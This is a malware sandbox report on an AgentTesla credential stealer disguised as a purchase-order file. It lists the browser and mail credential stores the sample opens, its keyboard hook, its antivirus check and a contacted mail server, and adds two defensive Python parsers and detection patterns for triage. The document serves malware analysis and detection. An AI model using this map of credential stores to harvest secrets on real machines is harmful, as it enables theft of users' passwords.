                      Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeQueries volume information: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
                      Source: C:\Users\user\Desktop\PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.,LTD 2024.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\SecurityCenter2 : AntiVirusProduct
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\SecurityCenter2 : AntiVirusProduct
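                      The HTML fragments in the memory strings above (host fields separated by <br>, a <hr>, then one <b>[window title]</b> (timestamp)<br>keys block per foreground window, with special keys written as {Win}, {ENTER} and so on) are the record AgentTesla assembles in memory before exfiltration. The parser below is an added example written for this page, not code from the report or from the sample; it turns such a record, or a raw process dump containing one, into structured fields for triage. The sample record is constructed from the strings above plus one hypothetical "Run" window entry, and the record boundary used for carving (a record runs from a "Time:" field to the first control byte or the next "Time:" field) is an assumption, not a documented property of the format.

```python
"""Parse the host-profile/keystroke record AgentTesla builds in memory.

Added example for this page.  Layout taken from the strings recovered in the
process dumps: header fields separated by <br>, a <hr>, then one
<b>[window title]</b> (timestamp)<br>keys block per foreground window.
"""
import re
from dataclasses import dataclass

# Constructed sample: header and first entry are the report's own strings,
# the second ("Run") entry is hypothetical, added to show a multi-window log.
SAMPLE_RECORD = (
    "Time: 11/24/2024 00:19:36<br>User Name: user<br>Computer Name: 506407<br>"
    "OSFullName: Microsoft Windows 10 Pro<br>"
    "CPU: Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz<br>RAM: 8191.25 MB<br><hr>"
    "<b>[ Program Manager]</b> (27/09/2024 06:43:05)<br>{Win}r{Win}r"
    "<b>[ Run]</b> (27/09/2024 06:43:09)<br>cmd{ENTER}"
)

ENTRY_RE = re.compile(
    r"<b>\[(?P<window>[^\]]*)\]</b> \((?P<ts>[^)]*)\)<br>(?P<keys>.*?)(?=<b>\[|\Z)",
    re.S)
TOKEN_RE = re.compile(r"\{[^{}]+\}|.", re.S)   # "{Win}"-style key or one character
# Assumed carving boundary: a record runs from "Time: <digit>" to the first
# control byte or the next "Time:" field (the format has no documented terminator).
RECORD_RE = re.compile(r"Time: \d(?:(?!Time: \d)[^\x00-\x1f\x7f])*")


@dataclass
class KeyLogEntry:
    window: str
    timestamp: str
    tokens: list           # e.g. ["{Win}", "r", "{Win}", "r"]

    def special_keys(self):
        return [t for t in self.tokens if t.startswith("{")]

    def typed_text(self):
        return "".join(t for t in self.tokens if not t.startswith("{"))


@dataclass
class AgentTeslaRecord:
    host: dict             # Time, User Name, Computer Name, OSFullName, CPU, RAM
    entries: list


def parse_record(blob: str) -> AgentTeslaRecord:
    head, sep, body = blob.partition("<hr>")
    if not sep:                         # carved fragment without the host header
        head, body = "", blob
    host = {}
    for fld in head.split("<br>"):
        key, colon, val = fld.partition(": ")
        if colon:
            # length-prefix bytes carved in front of the first field are dropped
            host[re.sub(r"^[^A-Za-z]+", "", key.strip())] = val.strip()
    first = body.find("<b>[")           # skips prefix bytes such as the "q?" above
    body = body[first:] if first >= 0 else ""
    entries = [KeyLogEntry(m["window"].strip(), m["ts"], TOKEN_RE.findall(m["keys"]))
               for m in ENTRY_RE.finditer(body)]
    return AgentTeslaRecord(host, entries)


def carve_records(dump: bytes) -> list:
    """Find every record in a raw process dump.  .NET strings live in memory
    as UTF-16LE, so both that view and the single-byte view are scanned."""
    views = (dump.decode("latin-1"), dump.decode("utf-16-le", errors="ignore"))
    return [parse_record(m.group(0)) for text in views for m in RECORD_RE.finditer(text)]


if __name__ == "__main__":
    rec = parse_record(SAMPLE_RECORD)
    print(rec.host)
    for e in rec.entries:
        print(f"[{e.window}] {e.timestamp}: typed={e.typed_text()!r} keys={e.special_keys()}")
```

Run it against a dump of the process that holds the record (here the sandbox's `00000004.00000002...` region of the renamed sample) and the host block gives you the victim fingerprint the stealer was about to send, while the per-window entries show what was typed where; the {Win}r sequence in the report's own entry is the Run dialog being opened.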

                      Stealing of Sensitive Information

                      Source: Yara match File source: 6.2.ctsdvwT.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara match File source: 10.2.ctsdvwT.exe.3a630e0.3.unpack, type: UNPACKEDPE
                      Source: Yara match File source: 10.2.ctsdvwT.exe.3a284c0.4.raw.unpack, type: UNPACKEDPE
                      Source: Yara match File source: 10.2.ctsdvwT.exe.3a630e0.3.raw.unpack, type: UNPACKEDPE
                      Source: Yara match File source: 0.2.PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.,LTD 2024.exe.3e72b80.2.raw.unpack, type: UNPACKEDPE
                      Source: Yara match File source: 5.2.ctsdvwT.exe.3cc9990.1.unpack, type: UNPACKEDPE
                      Source: Yara match File source: 0.2.PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.,LTD 2024.exe.3e37f60.1.unpack, type: UNPACKEDPE
                      Source: Yara match File source: 0.2.PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.,LTD 2024.exe.3e72b80.2.unpack, type: UNPACKEDPE
                      Source: Yara match File source: 5.2.ctsdvwT.exe.3cc9990.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara match File source: 10.2.ctsdvwT.exe.3a284c0.4.unpack, type: UNPACKEDPE
                      Source: Yara match File source: 0.2.PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.,LTD 2024.exe.3e37f60.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara match File source: 00000005.00000002.1877432434.0000000003D43000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match File source: 00000006.00000002.1928113926.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match File source: 00000005.00000002.1877432434.0000000003CC9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match File source: 0000000A.00000002.1963628997.0000000003A28000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match File source: 00000000.00000002.1756670007.0000000003E37000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match File source: Process Memory Space: PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.,LTD 2024.exe PID: 6752, type: MEMORYSTR
                      Source: Yara match File source: Process Memory Space: ctsdvwT.exe PID: 7060, type: MEMORYSTR
                      Source: Yara match File source: Process Memory Space: ctsdvwT.exe PID: 3684, type: MEMORYSTR
                      Source: Yara match File source: Process Memory Space: ctsdvwT.exe PID: 6840, type: MEMORYSTR
                      Source: Yara match File source: 0.2.PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.,LTD 2024.exe.2df3adc.0.unpack, type: UNPACKEDPE
                      Source: Yara match File source: 5.2.ctsdvwT.exe.2cc398c.0.unpack, type: UNPACKEDPE
                      Source: Yara match File source: 0.2.PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.,LTD 2024.exe.53c0000.5.unpack, type: UNPACKEDPE
                      Source: Yara match File source: 0.2.PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.,LTD 2024.exe.53c0000.5.raw.unpack, type: UNPACKEDPE
                      Source: Yara match File source: 5.2.ctsdvwT.exe.2cc398c.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara match File source: 0.2.PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.,LTD 2024.exe.2df3adc.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara match File source: 00000000.00000002.1760927897.00000000053C0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara match File source: 00000005.00000002.1867946503.0000000002CA1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match File source: 00000000.00000002.1755288317.0000000002DD1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
                      Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
                      Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini
                      Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe File opened: C:\Users\user\AppData\Roaming\8pecxstudios\Cyberfox\profiles.ini
                      Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe File opened: C:\Users\user\AppData\Roaming\NETGATE Technologies\BlackHawk\profiles.ini
                      Source: C:\Users\user\Desktop\PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.,LTD 2024.exe File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
                      Source: C:\Users\user\Desktop\PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.,LTD 2024.exe File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
                      Source: C:\Users\user\Desktop\PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.,LTD 2024.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles
                      Source: C:\Users\user\Desktop\PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.,LTD 2024.exe Key opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities
                      Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
                      Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
                      Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles
                      Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe Key opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities
                      Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
                      Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
                      Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles
                      Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe Key opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities
                      Source: Yara match File source: 6.2.ctsdvwT.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara match File source: 10.2.ctsdvwT.exe.3a630e0.3.unpack, type: UNPACKEDPE
                      Source: Yara match File source: 10.2.ctsdvwT.exe.3a284c0.4.raw.unpack, type: UNPACKEDPE
                      Source: Yara match File source: 10.2.ctsdvwT.exe.3a630e0.3.raw.unpack, type: UNPACKEDPE
                      Source: Yara match File source: 0.2.PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.,LTD 2024.exe.3e72b80.2.raw.unpack, type: UNPACKEDPE
                      Source: Yara match File source: 5.2.ctsdvwT.exe.3cc9990.1.unpack, type: UNPACKEDPE
                      Source: Yara match File source: 0.2.PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.,LTD 2024.exe.3e37f60.1.unpack, type: UNPACKEDPE
                      Source: Yara match File source: 0.2.PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.,LTD 2024.exe.3e72b80.2.unpack, type: UNPACKEDPE
                      Source: Yara match File source: 5.2.ctsdvwT.exe.3cc9990.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara match File source: 10.2.ctsdvwT.exe.3a284c0.4.unpack, type: UNPACKEDPE
                      Source: Yara match File source: 0.2.PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.,LTD 2024.exe.3e37f60.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara match File source: 00000005.00000002.1877432434.0000000003D43000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match File source: 00000006.00000002.1928113926.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match File source: 00000005.00000002.1877432434.0000000003CC9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match File source: 0000000A.00000002.1963628997.0000000003A28000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match File source: 00000000.00000002.1756670007.0000000003E37000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match File source: 0000000C.00000002.4184465405.000000000322B000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match File source: 00000006.00000002.1935883302.0000000002891000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match File source: 00000004.00000002.4186061604.0000000002B31000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match File source: Process Memory Space: PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.,LTD 2024.exe PID: 6752, type: MEMORYSTR
                      Source: Yara match File source: Process Memory Space: PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.,LTD 2024.exe PID: 7128, type: MEMORYSTR
                      Source: Yara match File source: Process Memory Space: ctsdvwT.exe PID: 7060, type: MEMORYSTR
                      Source: Yara match File source: Process Memory Space: ctsdvwT.exe PID: 3684, type: MEMORYSTR
                      Source: Yara match File source: Process Memory Space: ctsdvwT.exe PID: 6840, type: MEMORYSTR
                      Source: Yara match File source: Process Memory Space: ctsdvwT.exe PID: 2676, type: MEMORYSTR
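                      The file and registry targets listed in this section are the credential stores the sample reads: the Chromium "Login Data" databases of Chrome and Edge, the profiles.ini of the Gecko-family browsers (Firefox, Cyberfox, BlackHawk), the Thunderbird profile, the Outlook/MAPI profile key under Windows Messaging Subsystem and the IncrediMail identities key, while the PowerShell child's root\SecurityCenter2 query is the installed-AV check. The triage script below is an added example, not part of the report: it reads behaviour lines in the raw form shown on this page (action glued to the process path, optional "Jump to behavior" suffix), maps each target to its store and flags processes that reach into two or more. The store patterns cover only the paths and keys named on this page, and the sample lines are copied from it.

```python
"""Triage of the credential-store accesses listed in a sandbox behaviour report.

Added example for this page.  It reads "Source: <process><action>: <target>"
lines in the raw form shown above, maps each target to the credential store it
belongs to and flags processes that reach into several stores.  The patterns
cover only the paths and keys named on this page.
"""
import re
from collections import defaultdict

LINE_RE = re.compile(
    r"^Source: (?P<proc>.+?\.exe)\s*(?P<action>File opened|Key opened|WMI Queries): "
    r"(?P<target>.+?)\s*(?:Jump to behavior)?$")

# (label, pattern over the file path / registry key / WMI class)
STORE_PATTERNS = [
    ("chromium-logins",        r"\\(Google\\Chrome|Microsoft\\Edge)\\User Data\\[^\\]+\\Login Data$"),
    ("gecko-profile",          r"\\(Mozilla\\Firefox|8pecxstudios\\Cyberfox|NETGATE Technologies\\BlackHawk)\\profiles\.ini$"),
    ("thunderbird-profile",    r"\\Thunderbird\\profiles\.ini$"),
    ("mapi-profiles",          r"\\Windows Messaging Subsystem\\Profiles$"),   # Outlook/MAPI account data
    ("incredimail-identities", r"\\IncrediMail\\Identities$"),
    ("av-enumeration-wmi",     r"root\\SecurityCenter2 : AntiVirusProduct$"),
]

# Constructed input: lines copied from this report, including one that is not a
# credential access at all (the volume-information query) to show it is skipped.
SAMPLE_LINES = [
    r"Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data",
    r"Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data",
    r"Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini",
    r"Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeFile opened: C:\Users\user\AppData\Roaming\8pecxstudios\Cyberfox\profiles.ini",
    r"Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.iniJump to behavior",
    r"Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\ProfilesJump to behavior",
    r"Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeKey opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities",
    r"Source: C:\Users\user\Desktop\PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.,LTD 2024.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.iniJump to behavior",
    r"Source: C:\Users\user\Desktop\PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.,LTD 2024.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\ProfilesJump to behavior",
    r"Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\SecurityCenter2 : AntiVirusProduct",
    r"Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeQueries volume information: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe VolumeInformationJump to behavior",
]


def parse_line(line):
    """Return (process path, action, target) or None for lines we do not triage."""
    m = LINE_RE.match(line.strip())
    return (m["proc"], m["action"], m["target"]) if m else None


def classify(target):
    for label, pattern in STORE_PATTERNS:
        if re.search(pattern, target):
            return label
    return None


def triage(lines):
    """Map each process (basename) to the sorted list of store labels it touched."""
    hits = defaultdict(set)
    for line in lines:
        parsed = parse_line(line)
        if parsed is None:
            continue
        proc, _action, target = parsed
        label = classify(target)
        if label:
            hits[proc.rsplit("\\", 1)[-1]].add(label)
    return {proc: sorted(labels) for proc, labels in hits.items()}


def flag_harvesters(summary, min_stores=2):
    """Processes that open at least `min_stores` distinct credential stores.
    The WMI AV enumeration is reconnaissance, not a store, so it is not counted."""
    return sorted(proc for proc, labels in summary.items()
                  if len([l for l in labels if l != "av-enumeration-wmi"]) >= min_stores)


if __name__ == "__main__":
    summary = triage(SAMPLE_LINES)
    for proc, labels in summary.items():
        print(f"{proc}: {', '.join(labels)}")
    print("harvesting candidates:", flag_harvesters(summary))
```

Both the dropped copy in AppData\Roaming\ctsdvwT and the original sample cross the two-store threshold, which is the pattern to alert on in endpoint telemetry as well: a process outside the browser or mail client itself opening Login Data and a profiles.ini, or reading the Windows Messaging Subsystem\Profiles key, within one short interval.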

                      Remote Access Functionality

                      Source: Yara match File source: 6.2.ctsdvwT.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara match File source: 10.2.ctsdvwT.exe.3a630e0.3.unpack, type: UNPACKEDPE
                      Source: Yara match File source: 10.2.ctsdvwT.exe.3a284c0.4.raw.unpack, type: UNPACKEDPE
                      Source: Yara match File source: 10.2.ctsdvwT.exe.3a630e0.3.raw.unpack, type: UNPACKEDPE
                      Source: Yara match File source: 0.2.PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.,LTD 2024.exe.3e72b80.2.raw.unpack, type: UNPACKEDPE
                      Source: Yara match File source: 5.2.ctsdvwT.exe.3cc9990.1.unpack, type: UNPACKEDPE
                      Source: Yara match File source: 0.2.PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.,LTD 2024.exe.3e37f60.1.unpack, type: UNPACKEDPE
                      Source: Yara match File source: 0.2.PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.,LTD 2024.exe.3e72b80.2.unpack, type: UNPACKEDPE
                      Source: Yara match File source: 5.2.ctsdvwT.exe.3cc9990.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara match File source: 10.2.ctsdvwT.exe.3a284c0.4.unpack, type: UNPACKEDPE
                      Source: Yara match File source: 0.2.PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.,LTD 2024.exe.3e37f60.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara match File source: 00000005.00000002.1877432434.0000000003D43000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match File source: 00000006.00000002.1928113926.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match File source: 00000005.00000002.1877432434.0000000003CC9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match File source: 0000000A.00000002.1963628997.0000000003A28000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match File source: 00000000.00000002.1756670007.0000000003E37000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match File source: Process Memory Space: PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.,LTD 2024.exe PID: 6752, type: MEMORYSTR
                      Source: Yara match File source: Process Memory Space: ctsdvwT.exe PID: 7060, type: MEMORYSTR
                      Source: Yara match File source: Process Memory Space: ctsdvwT.exe PID: 3684, type: MEMORYSTR
                      Source: Yara match File source: Process Memory Space: ctsdvwT.exe PID: 6840, type: MEMORYSTR
                      Source: Yara match File source: 0.2.PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.,LTD 2024.exe.2df3adc.0.unpack, type: UNPACKEDPE
                      Source: Yara match File source: 5.2.ctsdvwT.exe.2cc398c.0.unpack, type: UNPACKEDPE
                      Source: Yara match File source: 0.2.PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.,LTD 2024.exe.53c0000.5.unpack, type: UNPACKEDPE
                      Source: Yara match File source: 0.2.PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.,LTD 2024.exe.53c0000.5.raw.unpack, type: UNPACKEDPE
                      Source: Yara match File source: 5.2.ctsdvwT.exe.2cc398c.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara match File source: 0.2.PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.,LTD 2024.exe.2df3adc.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara match File source: 00000000.00000002.1760927897.00000000053C0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara match File source: 00000005.00000002.1867946503.0000000002CA1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match File source: 00000000.00000002.1755288317.0000000002DD1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
MITRE ATT&CK Matrix (techniques the report flags for this sample; the bracketed digits are the report's count badges as extracted; the unflagged placeholder cells of the matrix template are omitted)

Reconnaissance: no technique flagged
Resource Development: no technique flagged
Initial Access: no technique flagged
Execution: Windows Management Instrumentation [131]
Persistence: DLL Side-Loading [1]; Registry Run Keys / Startup Folder [1]
Privilege Escalation: DLL Side-Loading [1]; Process Injection [12]; Registry Run Keys / Startup Folder [1]
Defense Evasion: Disable or Modify Tools [11]; Deobfuscate/Decode Files or Information [1]; Obfuscated Files or Information [2]; Software Packing [22]; DLL Side-Loading [1]; Masquerading [1]; Virtualization/Sandbox Evasion [141]; Process Injection [12]; Hidden Files and Directories [1]
Credential Access: OS Credential Dumping [1]; Input Capture [31]
Discovery: File and Directory Discovery [1]; System Information Discovery [24]; Security Software Discovery [221]; Process Discovery [2]; Virtualization/Sandbox Evasion [141]; Application Window Discovery [1]
Lateral Movement: no technique flagged
Collection: Archive Collected Data [11]; Data from Local System [1]; Email Collection [1]; Input Capture [31]; Clipboard Data [1]
Command and Control: Encrypted Channel [1]; Non-Standard Port [1]; Non-Application Layer Protocol [1]; Application Layer Protocol [11]
Exfiltration: no technique flagged
Impact: no technique flagged
Behavior Graph (ID: 1520405; Sample: PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.,LTD 2024.exe; Start date: 27/09/2024; Architecture: WINDOWS; Score: 100)

Sample-level signatures: Found malware configuration; Malicious sample detected (through community Yara rule); Multi AV Scanner detection for submitted file; 11 other signatures.
Contacted hosts: mail.yildiztepeenerji.com.tr; _kerberos._tcp.dc._msdcs.yildiztepeenerji.com.tr; 2 other IPs or domains.

Process tree (graph node numbers in parentheses):

PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.,LTD 2024.exe (8)
    Dropped: PR 2500006515 #U21...O.,LTD 2024.exe.log (ASCII)
    Signature: Adds a directory exclusion to Windows Defender
    - PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.,LTD 2024.exe (16)
        Network: mail.yildiztepeenerji.com.tr, 77.245.148.65, source port 50358 -> destination port 587, NIOBEBILISIMHIZMETLERITR, Turkey
        Dropped: C:\Users\user\AppData\Roaming\...\ctsdvwT.exe (PE32); C:\Users\user\...\ctsdvwT.exe:Zone.Identifier (ASCII)
        Signatures: Tries to steal Mail credentials (via file / registry access); Hides that the sample has been downloaded from the Internet (zone.identifier); Installs a global keyboard hook
    - powershell.exe (21)
        Signature: Loading BitLocker PowerShell Module
        - conhost.exe (31)
        - conhost.exe (33)
    - PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.,LTD 2024.exe (23)
ctsdvwT.exe (12)
    Signatures: Multi AV Scanner detection for dropped file; Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines); Machine Learning detection for dropped file; Contains functionality to register a low level keyboard hook
    - ctsdvwT.exe (25)
ctsdvwT.exe (14)
    - ctsdvwT.exe (27)
        Signature: Tries to harvest and steal browser information (history, passwords, etc)
    - ctsdvwT.exe (29)

Antivirus, Machine Learning and Genetic Malware Detection

Initial sample
Source | Detection | Scanner | Label
PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.,LTD 2024.exe | 71% | ReversingLabs | Win32.Trojan.AgentTesla
PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.,LTD 2024.exe | 100% | Joe Sandbox ML |

Dropped files
Source | Detection | Scanner | Label
